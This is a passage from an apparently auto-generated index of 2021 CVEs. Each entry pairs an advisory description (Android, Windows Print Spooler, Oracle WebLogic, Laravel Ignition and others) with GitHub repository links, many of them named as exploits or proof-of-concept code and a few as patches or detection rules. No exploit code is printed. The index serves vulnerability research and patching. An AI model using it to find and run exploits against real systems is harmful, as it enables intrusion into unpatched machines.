In onCreate of DevicePickerFragment.java, there is a possible way to trick the user to select an unwanted bluetooth device due to a tapjacking/overlay attack. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-11 Android-8.1 Android-9 Android-10Android ID: A-182584940
- [nanopathi/packages_apps_Settings_CVE-2021-0586](https://github.com/nanopathi/packages_apps_Settings_CVE-2021-0586)
### CVE-2021-0589 (2021-07-14)
In BTM_TryAllocateSCN of btm_scn.cc, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-8.1 Android-9 Android-10Android ID: A-180939982
- [Trinadh465/System_bt_AOSP10_r33_CVE-2021-0589](https://github.com/Trinadh465/System_bt_AOSP10_r33_CVE-2021-0589)
- [Satheesh575555/system_bt_AOSP10_r33_CVE-2021-0589](https://github.com/Satheesh575555/system_bt_AOSP10_r33_CVE-2021-0589)
### CVE-2021-0594 (2021-07-14)
In onCreate of ConfirmConnectActivity, there is a possible remote bypass of user consent due to improper input validation. This could lead to remote (proximal, NFC) escalation of privilege allowing an attacker to deceive a user into allowing a Bluetooth connection with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-11 Android-8.1 Android-9 Android-10Android ID: A-176445224
- [Satheesh575555/packages_apps_Nfc_AOSP10_r33_CVE-2021-0594](https://github.com/Satheesh575555/packages_apps_Nfc_AOSP10_r33_CVE-2021-0594)
### CVE-2021-0595 (2021-10-06)
In lockAllProfileTasks of RootWindowContainer.java, there is a possible way to access the work profile without the profile PIN, after logging in. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-9 Android-10 Android-11 Android-8.1Android ID: A-177457096
- [pazhanivel07/Settings-CVE-2021-0595](https://github.com/pazhanivel07/Settings-CVE-2021-0595)
- [pazhanivel07/frameworks_base_Aosp10_r33_CVE-2021-0595](https://github.com/pazhanivel07/frameworks_base_Aosp10_r33_CVE-2021-0595)
### CVE-2021-0600 (2021-07-14)
In onCreate of DeviceAdminAdd.java, there is a possible way to mislead a user to activate a device admin app due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-8.1 Android-9 Android-10 Android-11Android ID: A-179042963
- [Satheesh575555/packages_apps_Settings_AOSP10_r33_CVE-2021-0600](https://github.com/Satheesh575555/packages_apps_Settings_AOSP10_r33_CVE-2021-0600)
### CVE-2021-0640 (2021-08-17)
In noteAtomLogged of StatsdStats.cpp, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-9Android ID: A-187957589
- [Trinadh465/frameworks_base_AOSP10_r33_CVE-2021-0640](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2021-0640)
### CVE-2021-0652 (2021-10-22)
In VectorDrawable::VectorDrawable of VectorDrawable.java, there is a possible way to introduce a memory corruption due to sharing of not thread-safe objects. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.1 Android-9 Android-10 Android-11Android ID: A-185178568
- [Satheesh575555/frameworks_base_AOSP10_r33_CVE-2021-0652](https://github.com/Satheesh575555/frameworks_base_AOSP10_r33_CVE-2021-0652)
### CVE-2021-0683 (2021-10-06)
In runTraceIpcStop of ActivityManagerShellCommand.java, there is a possible deletion of system files due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-8.1 Android-9 Android-10Android ID: A-185398942
- [nanopathi/framework_base_AOSP10_r33_CVE-2021-0683_CVE-2021-0708](https://github.com/nanopathi/framework_base_AOSP10_r33_CVE-2021-0683_CVE-2021-0708)
### CVE-2021-0688 (2021-10-06)
In lockNow of PhoneWindowManager.java, there is a possible lock screen bypass due to a race condition. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-8.1 Android-9Android ID: A-161149543
- [Satheesh575555/frameworks_base_AOSP10_r33_CVE-2021-0688](https://github.com/Satheesh575555/frameworks_base_AOSP10_r33_CVE-2021-0688)
### CVE-2021-0705 (2021-10-22)
In sanitizeSbn of NotificationManagerService.java, there is a possible way to keep service running in foreground and keep granted permissions due to Bypass of Background Service Restrictions. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-10Android ID: A-185388103
- [ShaikUsaf/frameworks_base_AOSP10_r33_CVE-2021-0705](https://github.com/ShaikUsaf/frameworks_base_AOSP10_r33_CVE-2021-0705)
- [Trinadh465/frameworks_base_AOSP10_r33_CVE-2021-0705](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2021-0705)
### CVE-2021-0928 (2021-12-15)
In createFromParcel of OutputConfiguration.java, there is a possible parcel serialization/deserialization mismatch due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-9Android ID: A-188675581
- [michalbednarski/ReparcelBug2](https://github.com/michalbednarski/ReparcelBug2)
### CVE-2021-0954 (2021-12-15)
In ResolverActivity, there is a possible user interaction bypass due to a tapjacking/overlay attack. This could lead to local escalation of privilege with User execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10 Android-11Android ID: A-143559931
- [nanopathi/framework_base_AOSP10_r33_CVE-2021-0954](https://github.com/nanopathi/framework_base_AOSP10_r33_CVE-2021-0954)
### CVE-2021-0963 (2021-12-15)
In onCreate of KeyChainActivity.java, there is a possible way to use an app certificate stored in keychain due to a tapjacking/overlay attack. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-9Android ID: A-199754277
- [Trinadh465/packages_apps_KeyChain_AOSP10_r33_CVE-2021-0963](https://github.com/Trinadh465/packages_apps_KeyChain_AOSP10_r33_CVE-2021-0963)
### CVE-2021-22
- [LingerANR/CVE-2021-22-555](https://github.com/LingerANR/CVE-2021-22-555)
### CVE-2021-403
- [rhysmcneill/CVE-2021-403](https://github.com/rhysmcneill/CVE-2021-403)
### CVE-2021-521
- [NagendraPittu/CVE-2021-521-Exploit](https://github.com/NagendraPittu/CVE-2021-521-Exploit)
### CVE-2021-1056 (2021-01-08)
NVIDIA GPU Display Driver for Linux, all versions, contains a vulnerability in the kernel mode layer (nvidia.ko) in which it does not completely honor operating system file system permissions to provide GPU device-level isolation, which may lead to denial of service or information disclosure.
- [pokerfaceSad/CVE-2021-1056](https://github.com/pokerfaceSad/CVE-2021-1056)
### CVE-2021-1366 (2021-02-17)
A vulnerability in the interprocess communication (IPC) channel of Cisco AnyConnect Secure Mobility Client for Windows could allow an authenticated, local attacker to perform a DLL hijacking attack on an affected device if the VPN Posture (HostScan) Module is installed on the AnyConnect client. This vulnerability is due to insufficient validation of resources that are loaded by the application at run time. An attacker could exploit this vulnerability by sending a crafted IPC message to the AnyConnect process. A successful exploit could allow the attacker to execute arbitrary code on the affected machine with SYSTEM privileges. To exploit this vulnerability, the attacker needs valid credentials on the Windows system.
- [koztkozt/CVE-2021-1366](https://github.com/koztkozt/CVE-2021-1366)
### CVE-2021-1480 (2021-04-08)
Multiple vulnerabilities in Cisco SD-WAN vManage Software could allow an unauthenticated, remote attacker to execute arbitrary code or allow an authenticated, local attacker to gain escalated privileges on an affected system. For more information about these vulnerabilities, see the Details section of this advisory.
- [xmco/sdwan-cve-2021-1480](https://github.com/xmco/sdwan-cve-2021-1480)
### CVE-2021-1497 (2021-05-06)
Multiple vulnerabilities in the web-based management interface of Cisco HyperFlex HX could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. For more information about these vulnerabilities, see the Details section of this advisory.
- [34zY/APT-Backpack](https://github.com/34zY/APT-Backpack)
### CVE-2021-1585 (2021-07-08)
A vulnerability in the Cisco Adaptive Security Device Manager (ASDM) Launcher could allow an unauthenticated, remote attacker to execute arbitrary code on a user's operating system. This vulnerability is due to a lack of proper signature verification for specific code exchanged between the ASDM and the Launcher. An attacker could exploit this vulnerability by leveraging a man-in-the-middle position on the network to intercept the traffic between the Launcher and the ASDM and then inject arbitrary code. A successful exploit could allow the attacker to execute arbitrary code on the user's operating system with the level of privileges assigned to the ASDM Launcher. A successful exploit may require the attacker to perform a social engineering attack to persuade the user to initiate communication from the Launcher to the ASDM.
- [jbaines-r7/staystaystay](https://github.com/jbaines-r7/staystaystay)
### CVE-2021-1636 (2021-01-12)
Microsoft SQL Elevation of Privilege Vulnerability
- [Nate0634034090/bug-free-memory](https://github.com/Nate0634034090/bug-free-memory)
### CVE-2021-1647 (2021-01-12)
Microsoft Defender Remote Code Execution Vulnerability
- [findcool/cve-2021-1647](https://github.com/findcool/cve-2021-1647)
### CVE-2021-1656 (2021-01-12)
TPM Device Driver Information Disclosure Vulnerability
- [waleedassar/CVE-2021-1656](https://github.com/waleedassar/CVE-2021-1656)
### CVE-2021-1675 (2021-06-08)
Windows Print Spooler Remote Code Execution Vulnerability
- [yu2u/CVE-2021-1675](https://github.com/yu2u/CVE-2021-1675)
- [cube0x0/CVE-2021-1675](https://github.com/cube0x0/CVE-2021-1675)
- [LaresLLC/CVE-2021-1675](https://github.com/LaresLLC/CVE-2021-1675)
- [kondah/patch-cve-2021-1675](https://github.com/kondah/patch-cve-2021-1675)
- [evilashz/CVE-2021-1675-LPE-EXP](https://github.com/evilashz/CVE-2021-1675-LPE-EXP)
- [hlldz/CVE-2021-1675-LPE](https://github.com/hlldz/CVE-2021-1675-LPE)
- [puckiestyle/CVE-2021-1675](https://github.com/puckiestyle/CVE-2021-1675)
- [cybersecurityworks553/CVE-2021-1675_PrintNightMare](https://github.com/cybersecurityworks553/CVE-2021-1675_PrintNightMare)
- [tanarchytan/CVE-2021-1675](https://github.com/tanarchytan/CVE-2021-1675)
- [calebstewart/CVE-2021-1675](https://github.com/calebstewart/CVE-2021-1675)
- [Leonidus0x10/CVE-2021-1675-SCANNER](https://github.com/Leonidus0x10/CVE-2021-1675-SCANNER)
- [thomasgeens/CVE-2021-1675](https://github.com/thomasgeens/CVE-2021-1675)
- [mrezqi/CVE-2021-1675_CarbonBlack_HuntingQuery](https://github.com/mrezqi/CVE-2021-1675_CarbonBlack_HuntingQuery)
- [killtr0/CVE-2021-1675-PrintNightmare](https://github.com/killtr0/CVE-2021-1675-PrintNightmare)
- [corelight/CVE-2021-1675](https://github.com/corelight/CVE-2021-1675)
- [kougyokugentou/CVE-2021-1675](https://github.com/kougyokugentou/CVE-2021-1675)
- [ptter23/CVE-2021-1675](https://github.com/ptter23/CVE-2021-1675)
- [initconf/cve-2021-1675-printnightmare](https://github.com/initconf/cve-2021-1675-printnightmare)
- [ozergoker/PrintNightmare](https://github.com/ozergoker/PrintNightmare)
- [exploitblizzard/PrintNightmare-CVE-2021-1675](https://github.com/exploitblizzard/PrintNightmare-CVE-2021-1675)
- [edsonjt81/CVE-2021-1675](https://github.com/edsonjt81/CVE-2021-1675)
- [sailay1996/PrintNightmare-LPE](https://github.com/sailay1996/PrintNightmare-LPE)
- [JumpsecLabs/PrintNightmare](https://github.com/JumpsecLabs/PrintNightmare)
- [bartimusprimed/CVE-2021-1675-Yara](https://github.com/bartimusprimed/CVE-2021-1675-Yara)
- [k8gege/cve-2021-1675](https://github.com/k8gege/cve-2021-1675)
- [galoget/PrintNightmare-CVE-2021-1675-CVE-2021-34527](https://github.com/galoget/PrintNightmare-CVE-2021-1675-CVE-2021-34527)
- [thalpius/Microsoft-CVE-2021-1675](https://github.com/thalpius/Microsoft-CVE-2021-1675)
- [zha0/Microsoft-CVE-2021-1675](https://github.com/zha0/Microsoft-CVE-2021-1675)
- [Winter3un/CVE-2021-1675](https://github.com/Winter3un/CVE-2021-1675)
- [hahaleyile/my-CVE-2021-1675](https://github.com/hahaleyile/my-CVE-2021-1675)
- [mstxq17/CVE-2021-1675_RDL_LPE](https://github.com/mstxq17/CVE-2021-1675_RDL_LPE)
- [ly4k/PrintNightmare](https://github.com/ly4k/PrintNightmare)
- [Wra7h/SharpPN](https://github.com/Wra7h/SharpPN)
- [OppressionBreedsResistance/CVE-2021-1675-PrintNightmare](https://github.com/OppressionBreedsResistance/CVE-2021-1675-PrintNightmare)
- [eversinc33/NimNightmare](https://github.com/eversinc33/NimNightmare)
- [AndrewTrube/CVE-2021-1675](https://github.com/AndrewTrube/CVE-2021-1675)
- [TheJoyOfHacking/cube0x0-CVE-2021-1675](https://github.com/TheJoyOfHacking/cube0x0-CVE-2021-1675)
- [TheJoyOfHacking/calebstewart-CVE-2021-1675](https://github.com/TheJoyOfHacking/calebstewart-CVE-2021-1675)
- [jj4152/cve-2021-1675](https://github.com/jj4152/cve-2021-1675)
- [r1skkam/PrintNightmare](https://github.com/r1skkam/PrintNightmare)
- [peckre/PNCVE-Win10-20H2-Exploit](https://github.com/peckre/PNCVE-Win10-20H2-Exploit)
- [whoami-chmod777/CVE-2021-1675-CVE-2021-34527](https://github.com/whoami-chmod777/CVE-2021-1675-CVE-2021-34527)
- [whoami-chmod777/CVE-2021-1675---PrintNightmare-LPE-PowerShell-](https://github.com/whoami-chmod777/CVE-2021-1675---PrintNightmare-LPE-PowerShell-)
- [0xSs0rZ/Windows_Exploit](https://github.com/0xSs0rZ/Windows_Exploit)
### CVE-2021-1678 (2021-01-12)
Windows Print Spooler Spoofing Vulnerability
- [alvaciroliveira/RpcAuthnLevelPrivacyEnabled](https://github.com/alvaciroliveira/RpcAuthnLevelPrivacyEnabled)
### CVE-2021-1699 (2021-01-12)
Windows (modem.sys) Information Disclosure Vulnerability
- [waleedassar/CVE-2021-1699](https://github.com/waleedassar/CVE-2021-1699)
### CVE-2021-1732 (2021-02-25)
Windows Win32k Elevation of Privilege Vulnerability
- [KaLendsi/CVE-2021-1732-Exploit](https://github.com/KaLendsi/CVE-2021-1732-Exploit)
- [k-k-k-k-k/CVE-2021-1732](https://github.com/k-k-k-k-k/CVE-2021-1732)
- [oneoy/CVE-2021-1732-Exploit](https://github.com/oneoy/CVE-2021-1732-Exploit)
- [linuxdy/CVE-2021-1732_exp](https://github.com/linuxdy/CVE-2021-1732_exp)
- [Pai-Po/CVE-2021-1732](https://github.com/Pai-Po/CVE-2021-1732)
- [exploitblizzard/Windows-Privilege-Escalation-CVE-2021-1732](https://github.com/exploitblizzard/Windows-Privilege-Escalation-CVE-2021-1732)
- [BeneficialCode/CVE-2021-1732](https://github.com/BeneficialCode/CVE-2021-1732)
- [ExploitCN/CVE-2021-1732-EXP-](https://github.com/ExploitCN/CVE-2021-1732-EXP-)
- [r1l4-i3pur1l4/CVE-2021-1732](https://github.com/r1l4-i3pur1l4/CVE-2021-1732)
- [fenalik/CVE-2021-1732](https://github.com/fenalik/CVE-2021-1732)
- [4dp/CVE-2021-1732](https://github.com/4dp/CVE-2021-1732)
- [yangshifan-git/CVE-2021-1732](https://github.com/yangshifan-git/CVE-2021-1732)
- [asepsaepdin/CVE-2021-1732](https://github.com/asepsaepdin/CVE-2021-1732)
### CVE-2021-1748 (2021-04-02)
A validation issue was addressed with improved input sanitization. This issue is fixed in tvOS 14.4, watchOS 7.3, iOS 14.4 and iPadOS 14.4. Processing a maliciously crafted URL may lead to arbitrary javascript code execution.
- [Ivanhoe76zzzz/itmsBlock](https://github.com/Ivanhoe76zzzz/itmsBlock)
- [ChiChou/mistune-patch-backport](https://github.com/ChiChou/mistune-patch-backport)
### CVE-2021-1782 (2021-04-02)
A race condition was addressed with improved locking. This issue is fixed in macOS Big Sur 11.2, Security Update 2021-001 Catalina, Security Update 2021-001 Mojave, watchOS 7.3, tvOS 14.4, iOS 14.4 and iPadOS 14.4. A malicious application may be able to elevate privileges. Apple is aware of a report that this issue may have been actively exploited..
- [raymontag/cve-2021-1782](https://github.com/raymontag/cve-2021-1782)
- [synacktiv/CVE-2021-1782](https://github.com/synacktiv/CVE-2021-1782)
### CVE-2021-1883 (2021-09-08)
This issue was addressed with improved checks. This issue is fixed in Security Update 2021-004 Mojave, iOS 14.5 and iPadOS 14.5, watchOS 7.4, Security Update 2021-003 Catalina, tvOS 14.5, macOS Big Sur 11.3. Processing maliciously crafted server messages may lead to heap corruption.
- [gabe-k/CVE-2021-1883](https://github.com/gabe-k/CVE-2021-1883)
### CVE-2021-1905 (2021-05-07)
Possible use after free due to improper handling of memory mapping of multiple processes simultaneously. in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables
- [TAKIANFIF/CVE-2021-1905-CVE-2021-1906-CVE-2021-28663-CVE-2021-28664](https://github.com/TAKIANFIF/CVE-2021-1905-CVE-2021-1906-CVE-2021-28663-CVE-2021-28664)
### CVE-2021-1961 (2021-09-09)
Possible buffer overflow due to lack of offset length check while updating the buffer value in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables
- [tamirzb/CVE-2021-1961](https://github.com/tamirzb/CVE-2021-1961)
### CVE-2021-1965 (2021-07-13)
Possible buffer overflow due to lack of parameter length check during MBSSID scan IE parse in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Mobile, Snapdragon Wired Infrastructure and Networking
- [parsdefense/CVE-2021-1965](https://github.com/parsdefense/CVE-2021-1965)
- [foxtrot/CVE-2021-1965](https://github.com/foxtrot/CVE-2021-1965)
### CVE-2021-1994 (2021-01-20)
Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Web Services). Supported versions that are affected are 10.3.6.0.0 and 12.1.3.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
- [somatrasss/weblogic2021](https://github.com/somatrasss/weblogic2021)
### CVE-2021-2021 (2021-01-20)
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.22 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
- [TheCryingGame/CVE-2021-2021good](https://github.com/TheCryingGame/CVE-2021-2021good)
### CVE-2021-2109 (2021-01-20)
Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 7.2 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H).
- [Al1ex/CVE-2021-2109](https://github.com/Al1ex/CVE-2021-2109)
- [rabbitsafe/CVE-2021-2109](https://github.com/rabbitsafe/CVE-2021-2109)
- [yuaneuro/CVE-2021-2109_poc](https://github.com/yuaneuro/CVE-2021-2109_poc)
- [dinosn/CVE-2021-2109](https://github.com/dinosn/CVE-2021-2109)
- [lnwza0x0a/CVE-2021-2109](https://github.com/lnwza0x0a/CVE-2021-2109)
- [Vulnmachines/oracle-weblogic-CVE-2021-2109](https://github.com/Vulnmachines/oracle-weblogic-CVE-2021-2109)
### CVE-2021-2119 (2021-01-20)
Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.18. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle VM VirtualBox accessible data. CVSS 3.1 Base Score 6.0 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N).
- [Sauercloud/RWCTF21-VirtualBox-61-escape](https://github.com/Sauercloud/RWCTF21-VirtualBox-61-escape)
- [chatbottesisgmailh/Sauercloude](https://github.com/chatbottesisgmailh/Sauercloude)
- [shi10587s/Sauercloude](https://github.com/shi10587s/Sauercloude)
### CVE-2021-2173 (2021-04-22)
Vulnerability in the Recovery component of Oracle Database Server. Supported versions that are affected are 12.1.0.2, 12.2.0.1, 18c and 19c. Easily exploitable vulnerability allows high privileged attacker having DBA Level Account privilege with network access via Oracle Net to compromise Recovery. While the vulnerability is in Recovery, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Recovery accessible data. CVSS 3.1 Base Score 4.1 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:N/A:N).
- [emad-almousa/CVE-2021-2173](https://github.com/emad-almousa/CVE-2021-2173)
### CVE-2021-2175 (2021-04-22)
Vulnerability in the Database Vault component of Oracle Database Server. Supported versions that are affected are 12.1.0.2, 12.2.0.1, 18c and 19c. Easily exploitable vulnerability allows high privileged attacker having Create Any View, Select Any View privilege with network access via Oracle Net to compromise Database Vault. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Database Vault accessible data. CVSS 3.1 Base Score 2.7 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N).
- [emad-almousa/CVE-2021-2175](https://github.com/emad-almousa/CVE-2021-2175)
### CVE-2021-2302 (2021-04-22)
Vulnerability in the Oracle Platform Security for Java product of Oracle Fusion Middleware (component: OPSS). Supported versions that are affected are 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Platform Security for Java. Successful attacks of this vulnerability can result in takeover of Oracle Platform Security for Java. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
- [quynhle7821/CVE-2021-2302](https://github.com/quynhle7821/CVE-2021-2302)
### CVE-2021-2394 (2021-07-20)
Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3, IIOP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
- [lz2y/CVE-2021-2394](https://github.com/lz2y/CVE-2021-2394)
- [freeide/CVE-2021-2394](https://github.com/freeide/CVE-2021-2394)
- [BabyTeam1024/CVE-2021-2394](https://github.com/BabyTeam1024/CVE-2021-2394)
- [fasanhlieu/CVE-2021-2394](https://github.com/fasanhlieu/CVE-2021-2394)
### CVE-2021-2456 (2021-07-20)
Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Fusion Middleware (component: Analytics Web General). The supported version that is affected is 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Business Intelligence Enterprise Edition. Successful attacks of this vulnerability can result in takeover of Oracle Business Intelligence Enterprise Edition. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
- [peterjson31337/CVE-2021-2456](https://github.com/peterjson31337/CVE-2021-2456)
### CVE-2021-2471 (2021-10-20)
Vulnerability in the MySQL Connectors product of Oracle MySQL (component: Connector/J). Supported versions that are affected are 8.0.26 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Connectors. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all MySQL Connectors accessible data and unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Connectors. CVSS 3.1 Base Score 5.9 (Confidentiality and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:H).
- [SecCoder-Security-Lab/jdbc-sqlxml-xxe](https://github.com/SecCoder-Security-Lab/jdbc-sqlxml-xxe)
- [cckuailong/CVE-2021-2471](https://github.com/cckuailong/CVE-2021-2471)
- [DrunkenShells/CVE-2021-2471](https://github.com/DrunkenShells/CVE-2021-2471)
### CVE-2021-3007 (2021-01-04)
Laminas Project laminas-http before 2.14.2, and Zend Framework 3.0.0, has a deserialization vulnerability that can lead to remote code execution if the content is controllable, related to the __destruct method of the Zend\Http\Response\Stream class in Stream.php. NOTE: Zend Framework is no longer supported by the maintainer. NOTE: the laminas-http vendor considers this a "vulnerability in the PHP language itself" but has added certain type checking as a way to prevent exploitation in (unrecommended) use cases where attacker-supplied data can be deserialized
- [Vulnmachines/ZF3_CVE-2021-3007](https://github.com/Vulnmachines/ZF3_CVE-2021-3007)
### CVE-2021-3019 (2021-01-05)
ffay lanproxy 0.1 allows Directory Traversal to read /../conf/config.properties to obtain credentials for a connection to the intranet.
- [B1anda0/CVE-2021-3019](https://github.com/B1anda0/CVE-2021-3019)
- [0xf4n9x/CVE-2021-3019](https://github.com/0xf4n9x/CVE-2021-3019)
- [Maksim-venus/CVE-2021-3019](https://github.com/Maksim-venus/CVE-2021-3019)
- [murataydemir/CVE-2021-3019](https://github.com/murataydemir/CVE-2021-3019)
- [Aoyuh/cve-2021-3019](https://github.com/Aoyuh/cve-2021-3019)
- [givemefivw/CVE-2021-3019](https://github.com/givemefivw/CVE-2021-3019)
- [qiezi-maozi/CVE-2021-3019-Lanproxy](https://github.com/qiezi-maozi/CVE-2021-3019-Lanproxy)
- [a1665454764/CVE-2021-3019](https://github.com/a1665454764/CVE-2021-3019)
### CVE-2021-3060 (2021-11-10)
An OS command injection vulnerability in the Simple Certificate Enrollment Protocol (SCEP) feature of PAN-OS software allows an unauthenticated network-based attacker with specific knowledge of the firewall configuration to execute arbitrary code with root user privileges. The attacker must have network access to the GlobalProtect interfaces to exploit this issue. This issue impacts: PAN-OS 8.1 versions earlier than PAN-OS 8.1.20-h1; PAN-OS 9.0 versions earlier than PAN-OS 9.0.14-h3; PAN-OS 9.1 versions earlier than PAN-OS 9.1.11-h2; PAN-OS 10.0 versions earlier than PAN-OS 10.0.8; PAN-OS 10.1 versions earlier than PAN-OS 10.1.3. Prisma Access customers with Prisma Access 2.1 Preferred and Prisma Access 2.1 Innovation firewalls are impacted by this issue.
- [timb-machine-mirrors/rqu1-cve-2021-3060.py](https://github.com/timb-machine-mirrors/rqu1-cve-2021-3060.py)
- [anmolksachan/CVE-2021-3060](https://github.com/anmolksachan/CVE-2021-3060)
### CVE-2021-3064 (2021-11-10)
A memory corruption vulnerability exists in Palo Alto Networks GlobalProtect portal and gateway interfaces that enables an unauthenticated network-based attacker to disrupt system processes and potentially execute arbitrary code with root privileges. The attacker must have network access to the GlobalProtect interface to exploit this issue. This issue impacts PAN-OS 8.1 versions earlier than PAN-OS 8.1.17. Prisma Access customers are not impacted by this issue.
- [0xhaggis/CVE-2021-3064](https://github.com/0xhaggis/CVE-2021-3064)
### CVE-2021-3122 (2021-02-07)
CMCAgent in NCR Command Center Agent 16.3 on Aloha POS/BOH servers permits the submission of a runCommand parameter (within an XML document sent to port 8089) that enables the remote, unauthenticated execution of an arbitrary command as SYSTEM, as exploited in the wild in 2020 and/or 2021. NOTE: the vendor's position is that exploitation occurs only on devices with a certain "misconfiguration."
- [acquiredsecurity/CVE-2021-3122-Details](https://github.com/acquiredsecurity/CVE-2021-3122-Details)
### CVE-2021-3129 (2021-01-12)
Ignition before 2.5.2, as used in Laravel and other products, allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents(). This is exploitable on sites using debug mode with Laravel before 8.4.2.
- [ambionics/laravel-exploits](https://github.com/ambionics/laravel-exploits)
- [SNCKER/CVE-2021-3129](https://github.com/SNCKER/CVE-2021-3129)
- [SecPros-Team/laravel-CVE-2021-3129-EXP](https://github.com/SecPros-Team/laravel-CVE-2021-3129-EXP)
- [crisprss/Laravel_CVE-2021-3129_EXP](https://github.com/crisprss/Laravel_CVE-2021-3129_EXP)
- [nth347/CVE-2021-3129_exploit](https://github.com/nth347/CVE-2021-3129_exploit)
- [FunPhishing/Laravel-8.4.2-rce-CVE-2021-3129](https://github.com/FunPhishing/Laravel-8.4.2-rce-CVE-2021-3129)
- [zhzyker/CVE-2021-3129](https://github.com/zhzyker/CVE-2021-3129)
- [Y0s9/CVE-2021-3129](https://github.com/Y0s9/CVE-2021-3129)
- [idea-oss/laravel-CVE-2021-3129-EXP](https://github.com/idea-oss/laravel-CVE-2021-3129-EXP)
- [knqyf263/CVE-2021-3129](https://github.com/knqyf263/CVE-2021-3129)
